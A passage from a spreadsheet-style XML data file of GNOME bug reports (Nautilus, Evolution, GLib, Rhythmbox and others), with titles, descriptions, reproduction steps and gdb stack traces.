    instance_and_params=0xbfa0d44c) at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2478
#63 0xb77685cf in IA__g_signal_emit_valist (instance=0x809c238 signal_id=32 detail=0 var_args=)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2209
#64 0xb77689c9 in IA__g_signal_emit (instance=0x809c238 signal_id=32 detail=0)
    at /build/buildd/glib2.0-2.14.0/gobject/gsignal.c:2243
#65 0xb7bbf2f8 in gtk_widget_event_internal (widget=0x809c238 event=0x86f4ae0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkwidget.c:4674
#66 0xb7a7daae in IA__gtk_propagate_event (widget=0x809c238 event=0x86f4ae0)
    at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmain.c:2317
#67 0xb7a7ee82 in IA__gtk_main_do_event (event=0x86f4ae0) at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmain.c:1537
#68 0xb78d2e3a in gdk_event_dispatch (source=0x809b8c0 callback=0 user_data=0x0)
    at /build/buildd/gtk+2.0-2.11.6/gdk/x11/gdkevents-x11.c:2351
#69 0xb76be11c in IA__g_main_context_dispatch (context=0x809b908) at /build/buildd/glib2.0-2.14.0/glib/gmain.c:2061
#70 0xb76c155f in g_main_context_iterate (context=0x809b908 block=1 dispatch=1 self=0x8077470)
    at /build/buildd/glib2.0-2.14.0/glib/gmain.c:2694
#71 0xb76c1909 in IA__g_main_loop_run (loop=0x86ef100) at /build/buildd/glib2.0-2.14.0/glib/gmain.c:2898
#72 0xb7a7f314 in IA__gtk_main () at /build/buildd/gtk+2.0-2.11.6/gtk/gtkmain.c:1144
#73 0x0805b703 in main ()</t>
  </si>
  <si>
    <t>INTLTOOL-145027</t>
  </si>
  <si>
    <t>Configure error on 0.31</t>
  </si>
  <si>
    <t>Get this when trying to run configure.
configure: error: cannot find install-sh or install.sh in . ./.. ./../..</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-432493</t>
  </si>
  <si>
    <t>String could do with improving</t>
  </si>
  <si>
    <t>In the file data/gnome-power-manager.schemas.in.h line 44 we have the string:
If to lock the GNOME keyring before the computer enters sleep. This means you have to unlock the keyring on resume.
Though this is understandable it doesn't seem very grammatical. I would suggest changing this to:
Whether the GNOME keyring is locked before the computer enters sleep. This means the the keyring will have to be unlocked on resume.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-147878</t>
  </si>
  <si>
    <t>Clarify usage of term Humidity</t>
  </si>
  <si>
    <t>From Fedora:
  http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=110546
  The weather applet talks about humidity. I _think_ it's actually
  displaying relative humidity but it should be made clear if it's
  relative or absolute humidity. I doubt it's The percentage of
  moisture in the atmosphere. though since it's 78% where I am and
  nobody is having trouble breathing :)</t>
  </si>
  <si>
    <t>ORCA-503522</t>
  </si>
  <si>
    <t>magnification</t>
  </si>
  <si>
    <t>Enabling full screen magnification fails miserably in Solaris</t>
  </si>
  <si>
    <t>From Will's comment on bug 463881:
Something is still askew with trying to force full screen as the default
setting.  When I select the enable magnifier checkbox I get the following
output in the terminal where I ran Orca *and* all the controls on the magnifier
remain grayed out.  Without hand editing my user-preferences file I cannot get
out of this situation.
Traceback (most recent call last):
  File /usr/local/lib/python2.4/site-packages/orca/orca_gui_prefs.py line
2634 in magnifierSupportChecked
    mag.init()
  File /usr/local/lib/python2.4/site-packages/orca/mag.py line 878 in init
    applySettings()
  File /usr/local/lib/python2.4/site-packages/orca/mag.py line 779 in
applySettings
    __setupZoomer()
  File /usr/local/lib/python2.4/site-packages/orca/mag.py line 617 in
__setupZoomer
    raise RuntimeError Nothing can be magnified
RuntimeError: Nothing can be magnified</t>
  </si>
  <si>
    <t>GNOME-PYTHON-93312</t>
  </si>
  <si>
    <t>bonobo</t>
  </si>
  <si>
    <t>Python crashes if you try to destroy a window</t>
  </si>
  <si>
    <t>When closing a BonoboWindow I get the following error:
** ERROR **: file orbit-object.c: line 146 (do_unref): assertion failed:
 (robj-&gt;refs refs &gt; 0)
aborting...
It seems to me the reference counting of orbit-python doesn't work as it
should I stripped down hello.py in an attempt to uncover the bug...
Run the following code (showing an almost empty window) and close the window...
#!/usr/bin/env python
#
# hello.py
#
# A hello world application using the Bonobo UI handler
#
# Original Authors:
#      Michael Meeks    
#      Murray Cumming   
#      Havoc Pennington 
#
# Converted to Python by:
#      Johan Dahlin     
#
# Altered by Arjan Molenaar in an attempt to uncover a bug.
import sys
import bonobo
import bonobo.ui
import gtk
def destroy_cb(win):
    bonobo.main_quit()
def create_main_window ():
    window = bonobo.ui.Window ('Title' 'test')
    window.set_size_request (250 350)
    ui_container = window.get_ui_container ()
    engine = window.get_ui_engine ()
    engine.config_set_path ('/hello-app/UIConfig/kvps')
    ui_component = bonobo.ui.Component ('test')
    # Adding the corba_objref causes the app to crash once the objref is
    # assigned
    #x = ui_container.corba_objref ()
    ui_component.set_container (ui_container.corba_objref ())
    #bonobo.ui.util_set_ui (ui_component ''
    #                       HELLO_UI_XML
    #                      'bonobo-hello')
    #ui_component.add_verb_list (hello_verbs window)
    window.connect ('destroy' destroy_cb)
    window.show_all ()
    return window
create_main_window ()
print 'in main...'
bonobo.main ()</t>
  </si>
  <si>
    <t>a.molenaar</t>
  </si>
  <si>
    <t>TOMBOY-518870</t>
  </si>
  <si>
    <t>Notebooks don't Sync if they are not already created....</t>
  </si>
  <si>
    <t>I just installed 0.94 to play with the notebook feature.  It seems that if I create a notebook and some notes on machine A when I sync to machine B it will only sync the notes (and apparently some metadata) but will not create the notebook on machine B.  
However as soon as I manually create the notebook on machine B the notes are automatically placed in the notebook.
If more info is need please let me know!</t>
  </si>
  <si>
    <t>v0lksman69</t>
  </si>
  <si>
    <t>GIMP-473265</t>
  </si>
  <si>
    <t>Supersampling option of transf. tools should be on by default (and perhaps removed)</t>
  </si>
  <si>
    <t>Supersampling option of transformation tools should be ON by default or may be even on permanently and removed from user interface. Without supersampling on scaled down parts of transformed image look aliased. There is no point to keep this option off by default and may be not even to keep it in the user interface.</t>
  </si>
  <si>
    <t>GLIB-141159</t>
  </si>
  <si>
    <t>Compile error on AIX</t>
  </si>
  <si>
    <t>The file glib/gmodule/gmodule.c introduced a 3rd parameter to the
_g_module_open() function. Most of the gmodule-xx.c files were aligned to this
prototype modification. Unfortunately gmodule-ar.c (a new addition) was not.
Two lines of gmodule-ar.c require modification :
line 100 :
old
   gboolean     bind_lazy)
new
   gboolean     bind_lazy
   gboolean     bind_local)
line 117 :
old
   handle = dlopen (full_name RTLD_GLOBAL | RTLD_MEMBER | (bind_lazy ?
RTLD_LAZY : RTLD_NOW))
new
   handle = dlopen (full_name
           (bind_local ? 0 : RTLD_GLOBAL) | RTLD_MEMBER | (bind_lazy ? RTLD_LAZY
: RTLD_NOW))</t>
  </si>
  <si>
    <t>Michael.Wilson</t>
  </si>
  <si>
    <t>GVFS-519599</t>
  </si>
  <si>
    <t>deadlock in GDaemonVolumeMonitor</t>
  </si>
  <si>
    <t>This happened when mounting a gphoto2 mount. Both the gnome-panel and the nautilus process deadlocks in the same place. Here's the stack trace from the panel:
#0  0x00110416 in __kernel_vsyscall ()
#1  0x00d22d19 in __lll_lock_wait () from /lib/libpthread.so.0
#2  0x00d1e124 in _L_lock_89 () from /lib/libpthread.so.0
#3  0x00d1da52 in pthread_mutex_lock () from /lib/libpthread.so.0
#4  0x06cca27a in get_mounts (volume_monitor=0x8478008)
    at gdaemonvolumemonitor.c:55
#5  0x00149430 in g_volume_monitor_get_mounts () from /lib/libgio-2.0.so.0
#6  0x00147bb2 in ?? () from /lib/libgio-2.0.so.0
#7  0x00149430 in g_volume_monitor_get_mounts () from /lib/libgio-2.0.so.0
#8  0x0807d113 in ?? ()
#9  0x08477f78 in ?? ()
#10 0x084c2000 in ?? ()
#11 0xbf8d81f8 in ?? ()
#12 0x001296df in g_file_new_for_uri () from /lib/libgio-2.0.so.0
#13 0x0807d5c8 in panel_util_get_label_for_uri ()
#14 0x0809a2f0 in ?? ()
#15 0x08889b08 in ?? ()
#16 0x00000000 in ?? ()</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER-332463</t>
  </si>
  <si>
    <t>gnome-screensaver doesn't perform as well as xscreensaver with the same hacks</t>
  </si>
  <si>
    <t>Forwarded from: https://launchpad.net/distros/ubuntu/+source/gnome-screensaver/+bug/22045
My laptop (Thinkpad T30) has a 16M Radeon 7500 Mobility chip in it handles opengl acceleration fairly well (good enough to use the opengl xscreensaver hacks at 16bpp without much issue). I personally like the GLSlideshow and Carousel hacks and they look fine when I drive them xscreensaver. With gnome-screensaver however I am getting a lot of flicker between frames.
I've switched to gnome-screensaver's 'Pictures folder' for the time being but it is hideously slow (though it doesn't flicker) -- apparently it doesn't even attempt to use opengl?
Anyway I'd really prefer to use Carousel or GLSlideshow on my laptop as I do on
my desktops (which run it just fine with gnome-screensaver and modern nvidia cards)
Yeah it's a Radeon 7500M which has been well supported by opensource drivers for some time.
RE: comment #1 here's why I think it's a gnome-screensaver problem. If I apt-get install xscreensaver killall gnome-screensaver xscreensaver-demo and select the same hack when I lock the screen it displays perfectly. When I apt-get install gnome-screensaver killall xscreensaver gnome-screensaver and lock the screen it flicker really badly.
I believe xscreensaver does some work to make sure the images are loaded the right way so that may be that's where the difference is. If I'm not mistaken my display has a fairly small texture size limit so perhaps xscreensaver ensures that the images are scaled before turning them in to textures. Maybe gnome-screensaver just turns the jpegs into textures without any extra processing?
I have an ATI card (Radeon 9200se) and I am happily using the open source xserver-xorg-driver-ati driver on Dapper.
I am experiencing similar issues: the GL hacks are fine when run from xscreensaver or by themselves while they flicker terribly when run by gnome-screensaver. Non-GL hacks show no issues.
Even though it looks like a driver problem there still is the question why this only happens with gnome-screensaver? Plain hacks don't have this problem. Is gnome-screensaver doing something differently when displaying the hacks?
I just confirmed this with the Dapper Flight 4 Live CD. Here are the steps I went through to reproduce:
1) download dapper flight 4 live cd and burn it
2) boot
3) change DefaultDepth in /etc/X11/xorg.conf to 16 ( my T30 only has 16M of ram and a 1400x1050 screen so direct rendering is only available for 1400x1050@16 bits)
4) restart gdm
5) load up the gnome-screensaver-preferences and select the GLText screensaver and note how it flickers
6) run gnome-screensaver-command --activate and see the flickery badness 7) sudo apt-get update &amp;&amp; sudo apt-get install xscreensaver
8) run xscreensaver-demo and select GLText
9) hit Preview and note the lack of flicker.
Again this is on my Thinkpad T30 with this card (as told by lspci): 0000:01:00.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility M7 LW [Radeon Mobility 7500]</t>
  </si>
  <si>
    <t>NAUTILUS-72396</t>
  </si>
  <si>
    <t>Crashes after attempt to remove theme</t>
  </si>
  <si>
    <t xml:space="preserve">Package: nautilus
Severity: critical
Version: 1.1.5
Synopsis: Crashes after attempt to remove theme
Bugzilla-Product: nautilus
Bugzilla-Component: Backgrounds Emblems and Themes
BugBuddy-GnomeVersion: 2.0 (1.112.0)
Description:
Description of Problem:
I was trying to remove a theme and it crashed. I'd previously tried to
remove a theme and had no crash but nothing had been removed either.
Debugging Information:
[New Thread 1024 (LWP 3930)]
[New Thread 2049 (LWP 3931)]
[New Thread 1026 (LWP 3932)]
[New Thread 2051 (LWP 3933)]
[New Thread 3076 (LWP 3934)]
[New Thread 4101 (LWP 3935)]
[New Thread 5126 (LWP 3936)]
[New Thread 6151 (LWP 3937)]
0x40a6ce29 in __wait4 () from /lib/libc.so.6
#0  0x40a6ce29 in __wait4 () from /lib/libc.so.6
#1  0x40ae9050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x408b08de in waitpid (pid=4073 stat_loc=0xbfffed7c options=0)
    at wrapsyscall.c:172
#3  0x40188fa9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x408ae4c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 142467544 esi = 0 ebp = 3221221688 esp =
3221221664 ebx = 1079827124 edx = 142467544 ecx = 1735290926 eax =
142462896 trapno = 14 err = 4 eip = 1078690421 cs = 35 __csh = 0
eflags = 66199 esp_at_signal = 3221221664 ss = 43 __ssh = 0 fpstate
= 0xbfffeea0 oldmask = 2147483648 cr2 = 8})
    at signals.c:97
#5  
#6  _gtk_rbtree_node_find_offset (tree=0x87de1d8 node=0x874dbc0)
    at gtkrbtree.c:1028
#7  0x405383e4 in gtk_tree_view_clamp_node_visible (tree_view=0x8730048
    tree=0x87de1d8 node=0x874dbc0) at gtktreeview.c:6031
#8  0x4053da84 in gtk_tree_view_real_set_cursor (tree_view=0x8730048 
    path=0x86fa9c8 clear_and_select=1) at gtktreeview.c:8850
#9  0x40530f8e in gtk_tree_view_button_press (widget=0x8730048 
    event=0x81e96f8) at gtktreeview.c:1824
#10 0x4048bf6d in _gtk_marshal_BOOLEAN__BOXED (closure=0x81137b8 
    return_value=0xbffff460 n_param_values=2 param_values=0xbffff580
    invocation_hint=0xbffff488 marshal_data=0x40530ad8) at
gtkmarshalers.c:82
#11 0x408c43ab in g_type_class_meta_marshal (closure=0x81137b8 
    return_value=0xbffff460 n_param_values=2 param_values=0xbffff580
    invocation_hint=0xbffff488 marshal_data=0xb0) at gclosure.c:514
#12 0x408c3fb2 in g_closure_invoke (closure=0x81137b8 
    return_value=0xbffff460 n_param_values=2 param_values=0xbffff580
    invocation_hint=0xbffff488) at gclosure.c:437
#13 0x408d81b8 in signal_emit_unlocked_R (node=0x81137f8 detail=0 
    instance=0x8730048 emission_return=0xbffff520 
    instance_and_params=0xbffff580) at gsignal.c:2378
#14 0x408d65c8 in g_signal_emit_valist (instance=0x8730048
signal_id=43 
    detail=0 var_args=0xbffff70c) at gsignal.c:2109
#15 0x404c8b15 in gtk_signal_emit (object=0x8730048 signal_id=43)
    at gtksignal.c:355
#16 0x4054ed42 in gtk_widget_event_internal (widget=0x8730048
event=0x81e96f8)
    at gtkwidget.c:3069
#17 0x4048be21 in gtk_propagate_event (widget=0x8730048
event=0x81e96f8)
    at gtkmain.c:1905
#18 0x4048ac81 in gtk_main_do_event (event=0x81e96f8) at gtkmain.c:1157
#19 0x40605d3b in gdk_event_dispatch (source=0x80c7750 callback=0 
    user_data=0x0) at gdkevents-x11.c:1753
#20 0x4091a5a6 in g_main_dispatch (context=0x80c7780) at gmain.c:1616
#21 0x4091b3bd in g_main_context_dispatch (context=0x80c7780) at
gmain.c:2160
#22 0x4091b750 in g_main_context_iterate (context=0x80c7780 block=1 
    dispatch=1 self=0x80b9828) at gmain.c:2241
#23 0x4091bdf6 in g_main_loop_run (loop=0x821d920) at gmain.c:2461
#24 0x4048a623 in gtk_main () at gtkmain.c:882
#25 0x080654d5 in main (argc=6 argv=0xbffffb44) at nautilus-main.c:268
#26 0x409d5306 in __libc_start_main (main=0x8064fe4  argc=6 
    ubp_av=0xbffffb44 init=0x8059194  fini=0x809d060  
    rtld_fini=0x4000d2dc  stack_end=0xbffffb3c)
    at ../sysdeps/generic/libc-start.c:129
Thread 8 (Thread 6151 (LWP 3937)):
#0  0x409e7966 in __sigsuspend (set=0xbedff9fc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x408add61 in __pthread_wait_for_restart_signal (self=0xbedffc00)
    at pthread.c:969
#2  0x408a9ee4 in pthread_cond_wait (cond=0x829688c mutex=0x8296874)
    at restart.h:34
#3  0x4028fcfc in gnome_vfs_thread_pool_wait_for_work (state=0x8296870)
    at gnome-vfs-thread-pool.c:155
#4  0x4028fd41 in thread_entry (cast_to_state=0x8296870)
    at gnome-vfs-thread-pool.c:176
#5  0x408aaf87 in pthread_start_thread (arg=0xbedffc00) at
manager.c:284
Thread 7 (Thread 5126 (LWP 3936)):
#0  0x409e7966 in __sigsuspend (set=0xbefff9fc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x408add61 in __pthread_wait_for_restart_signal (self=0xbefffc00)
    at pthread.c:969
#2  0x408a9ee4 in pthread_cond_wait (cond=0x829666c mutex=0x8296654)
    at restart.h:34
#3  0x4028fcfc in gnome_vfs_thread_pool_wait_for_work (state=0x8296650)
    at gnome-vfs-thread-pool.c:155
#4  0x4028fd41 in thread_entry (cast_to_state=0x8296650)
    at gnome-vfs-thread-pool.c:176
#5  0x408aaf87 in pthread_start_thread (arg=0xbefffc00) at
manager.c:284
Thread 6 (Thread 4101 (LWP 3935)):
#0  0x409e7966 in __sigsuspend (set=0xbf1ff9fc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x408add61 in __pthread_wait_for_restart_signal (self=0xbf1ffc00)
    at pthread.c:969
#2  0x408a9ee4 in pthread_cond_wait (cond=0x8296474 mutex=0x829645c)
    at restart.h:34
#3  0x4028fcfc in gnome_vfs_thread_pool_wait_for_work (state=0x8296458)
    at gnome-vfs-thread-pool.c:155
#4  0x4028fd41 in thread_entry (cast_to_state=0x8296458)
    at gnome-vfs-thread-pool.c:176
#5  0x408aaf87 in pthread_start_thread (arg=0xbf1ffc00) at
manager.c:284
Thread 5 (Thread 3076 (LWP 3934)):
#0  0x409e7966 in __sigsuspend (set=0xbf3ff9fc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x408add61 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x408a9ee4 in pthread_cond_wait (cond=0x8282a94 mutex=0x8282a7c)
    at restart.h:34
#3  0x4028fcfc in gnome_vfs_thread_pool_wait_for_work (state=0x8282a78)
    at gnome-vfs-thread-pool.c:155
#4  0x4028fd41 in thread_entry (cast_to_state=0x8282a78)
    at gnome-vfs-thread-pool.c:176
#5  0x408aaf87 in pthread_start_thread (arg=0xbf3ffc00) at
manager.c:284
Thread 4 (Thread 2051 (LWP 3933)):
#0  0x409e7966 in __sigsuspend (set=0xbf5ff9fc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x408add61 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x408a9ee4 in pthread_cond_wait (cond=0x8209ed4 mutex=0x8209ebc)
    at restart.h:34
#3  0x4028fcfc in gnome_vfs_thread_pool_wait_for_work (state=0x8209eb8)
    at gnome-vfs-thread-pool.c:155
#4  0x4028fd41 in thread_entry (cast_to_state=0x8209eb8)
    at gnome-vfs-thread-pool.c:176
#5  0x408aaf87 in pthread_start_thread (arg=0xbf5ffc00) at
manager.c:284
Thread 3 (Thread 1026 (LWP 3932)):
#0  0x409e7966 in __sigsuspend (set=0xbf7ff9fc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x408add61 in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x408a9ee4 in pthread_cond_wait (cond=0x81fc26c mutex=0x81fc254)
    at restart.h:34
#3  0x4028fcfc in gnome_vfs_thread_pool_wait_for_work (state=0x81fc250)
    at gnome-vfs-thread-pool.c:155
#4  0x4028fd41 in thread_entry (cast_to_state=0x81fc250)
    at gnome-vfs-thread-pool.c:176
#5  0x408aaf87 in pthread_start_thread (arg=0xbf7ffc00) at
manager.c:284
Thread 2 (Thread 2049 (LWP 3931)):
#0  0x40a97c6c in __poll (fds=0x8200334 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x408aad0e in __pthread_manager (arg=0x14) at manager.c:140
Thread 1 (Thread 1024 (LWP 3930)):
#0  0x40a6ce29 in __wait4 () from /lib/libc.so.6
#1  0x40ae9050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x408b08de in waitpid (pid=4073 stat_loc=0xbfffed7c options=0)
    at wrapsyscall.c:172
#3  0x40188fa9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x408ae4c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 142467544 esi = 0 ebp = 3221221688 esp =
3221221664 ebx = 1079827124 edx = 142467544 ecx = 1735290926 eax =
142462896 trapno = 14 err = 4 eip = 1078690421 cs = 35 __csh = 0
eflags = 66199 esp_at_signal = 3221221664 ss = 43 __ssh = 0 fpstate
= 0xbfffeea0 oldmask = 2147483648 cr2 = 8})
    at signals.c:97
#5  
#6  _gtk_rbtree_node_find_offset (tree=0x87de1d8 node=0x874dbc0)
    at gtkrbtree.c:1028
#7  0x405383e4 in gtk_tree_view_clamp_node_visible (tree_view=0x8730048
    tree=0x87de1d8 node=0x874dbc0) at gtktreeview.c:6031
#8  0x4053da84 in gtk_tree_view_real_set_cursor (tree_view=0x8730048 
    path=0x86fa9c8 clear_and_select=1) at gtktreeview.c:8850
#9  0x40530f8e in gtk_tree_view_button_press (widget=0x8730048 
    event=0x81e96f8) at gtktreeview.c:1824
#10 0x4048bf6d in _gtk_marshal_BOOLEAN__BOXED (closure=0x81137b8 
    return_value=0xbffff460 n_param_values=2 param_values=0xbffff580
    invocation_hint=0xbffff488 marshal_data=0x40530ad8) at
gtkmarshalers.c:82
#11 0x408c43ab in g_type_class_meta_marshal (closure=0x81137b8 
    return_value=0xbffff460 n_param_values=2 param_values=0xbffff580
    invocation_hint=0xbffff488 marshal_data=0xb0) at gclosure.c:514
#12 0x408c3fb2 in g_closure_invoke (closure=0x81137b8 
    return_value=0xbffff460 n_param_values=2 param_values=0xbffff580
    invocation_hint=0xbffff488) at gclosure.c:437
#13 0x408d81b8 in signal_emit_unlocked_R (node=0x81137f8 detail=0 
    instance=0x8730048 emission_return=0xbffff520 
    instance_and_params=0xbffff580) at gsignal.c:2378
#14 0x408d65c8 in g_signal_emit_valist (instance=0x8730048
signal_id=43 
    detail=0 var_args=0xbffff70c) at gsignal.c:2109
#15 0x404c8b15 in gtk_signal_emit (object=0x8730048 signal_id=43)
    at gtksignal.c:355
#16 0x4054ed42 in gtk_widget_event_internal (widget=0x8730048
event=0x81e96f8)
    at gtkwidget.c:3069
#17 0x4048be21 in gtk_propagate_event (widget=0x8730048
event=0x81e96f8)
    at gtkmain.c:1905
#18 0x4048ac81 in gtk_main_do_event (event=0x81e96f8) at gtkmain.c:1157
#19 0x40605d3b in gdk_event_dispatch (source=0x80c7750 callback=0 
    user_data=0x0) at gdkevents-x11.c:1753
#20 0x4091a5a6 in g_main_dispatch (context=0x80c7780) at gmain.c:1616
#21 0x4091b3bd in g_main_context_dispatch (context=0x80c7780) at
gmain.c:2160
#22 0x4091b750 in g_main_context_iterate (context=0x80c7780 block=1 
    dispatch=1 self=0x80b9828) at gmain.c:2241
#23 0x4091bdf6 in g_main_loop_run (loop=0x821d920) at gmain.c:2461
#24 0x4048a623 in gtk_main () at gtkmain.c:882
#25 0x080654d5 in main (argc=6 argv=0xbffffb44) at nautilus-main.c:268
#26 0x409d5306 in __libc_start_main (main=0x8064fe4  argc=6 
    ubp_av=0xbffffb44 init=0x8059194  fini=0x809d060  
    rtld_fini=0x4000d2dc  stack_end=0xbffffb3c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40a6ce29 in __wait4 () from /lib/libc.so.6
#0  0x40a6ce29 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40ae9050 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x408b08de in waitpid (pid=4073 stat_loc=0xbfffed7c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffed7c
options = 0
result = 0
oldtype = 0
#3  0x40188fa9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
	in gnome-ui-init.c
estatus = 1082953846
in_segv = 1
pid = 0
#4  0x408ae4c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 142467544 esi = 0 ebp = 3221221688 esp =
3221221664 ebx = 1079827124 edx = 142467544 ecx = 1735290926 eax =
142462896 trapno = 14 err = 4 eip = 1078690421 cs = 35 __csh = 0
eflags = 66199 esp_at_signal = 3221221664 ss = 43 __ssh = 0 fpstate
= 0xbfffeea0 oldmask = 2147483648 cr2 = 8})
    at signals.c:97
	in signals.c
self = 0x408b7460
in_sighandler = 0x0
self = 0x408b7460
in_sighandler = 0x0
#5  
No locals.
#6  _gtk_rbtree_node_find_offset (tree=0x87de1d8 node=0x874dbc0)
    at gtkrbtree.c:1028
	in gtkrbtree.c
node = (GtkRBNode *) 0x0
last = (GtkRBNode *) 0xfffffe00
retval = 0
#7  0x405383e4 in gtk_tree_view_clamp_node_visible (tree_view=0x8730048
    tree=0x87de1d8 node=0x874dbc0) at gtktreeview.c:6031
	in gtktreeview.c
offset = 47
real_height = 14
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-02-23 23:42 -------
Unknown version 1.1.x in product nautilus. Setting version to the default unspecified.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>BRASERO-480745</t>
  </si>
  <si>
    <t>Unable to burn DVD</t>
  </si>
  <si>
    <t>My plan is to force myself to use brasero now so don't wonder why you get a lot of bug reports )
I tried to burn a DVD with about 4.2 gig of data. At least this is what brasero calculates in the capacity bar and also nautilus reports 4.2 gig. The selection burns without problem with nautilus cd burner btw.
So what I got when pressing Burn... was a dialog saying that brasero was unable to burn this disc with the currently available plugins. Strange becasue I have all plugins but libburn enabled.
Also why does the burn dialog say 4.4 gig and the capacity bar 4.3?</t>
  </si>
  <si>
    <t>EVOLUTION-200165</t>
  </si>
  <si>
    <t>forward without attachments</t>
  </si>
  <si>
    <t>either as a separate option or some way to remove the attachments from
the attached message...</t>
  </si>
  <si>
    <t>GSTREAMER-131362</t>
  </si>
  <si>
    <t>use serialize/deserialize in the core</t>
  </si>
  <si>
    <t>Core should start using serialize/deserialize for caps and structure
to/from_string.</t>
  </si>
  <si>
    <t>GTK+-122941</t>
  </si>
  <si>
    <t>KP_Separator doesn't do anything</t>
  </si>
  <si>
    <t>The symbol KP_Separator doesn't do anything in most of the gtk2
applications. According to the comments to bug #105161 it should
insert a comma. (I've checked that patch from CVS but it doesn't solve
the problem.) Actually it works if I choose X Input Method.
Attached trivial patch works for me.</t>
  </si>
  <si>
    <t>EVOLUTION-209353</t>
  </si>
  <si>
    <t>[Home] [End] in task list behaves strange</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
When pressing the [Home] or [End] key inside the editline when entering a
new task behaves strange. Additionally pressing the middle mouse button to
paste a previously marked test doesn't work.
Steps to reproduce the problem:
1. go to Tasks
2. click in the click to add a task editline
3. enter some text
4. press the [Home] or [End] key on you keyboard
5. watch the result
1. mark a text somewhere (e.g. an URL in the browser)
2. go to Evolution and switch to Tasks
2. click in the click to add a task editline
3. enter some text
4. press the middle mouse button to paste the marked text
5. watch the result
Actual Results:
[Home] [End] jump to the Icon and Category field respectively. middle
mouse button deactivates the editline
Expected Results:
[Home] [End] jump to the beginning and end of the entered text
middle mouse button pastes the prev. marked text.
How often does this happen? 
always
Additional Information:</t>
  </si>
  <si>
    <t>RHYTHMBOX-451268</t>
  </si>
  <si>
    <t>Refusing to add non-unique action to action group</t>
  </si>
  <si>
    <t>When starting rhythmbox 0.11.1:
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchAll' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchArtists' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchAlbums' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchTitles' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchAll' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchArtists' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchAlbums' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'StaticPlaylistSearchTitles' to action group 'StaticPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchAll' to action group 'AutoPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchArtists' to action group 'AutoPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchAlbums' to action group 'AutoPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchTitles' to action group 'AutoPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchAll' to action group 'AutoPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchArtists' to action group 'AutoPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchAlbums' to action group 'AutoPlaylistActions'
(rhythmbox:19865): Gtk-WARNING **: Refusing to add non-unique action 'AutoPlaylistSearchTitles' to action group 'AutoPlaylistActions'</t>
  </si>
  <si>
    <t>GRAPEVINE-40236</t>
  </si>
  <si>
    <t>Framework for displaying notices and observing ongoing progress</t>
  </si>
  <si>
    <t xml:space="preserve">
------- Additional Comments From ramiro@fateware.com 2000-04-19 16:08:35 ----
Not going to be ready for next week.
------- Additional Comments From jirka@5z.com 2000-04-30 23:59:10 ----
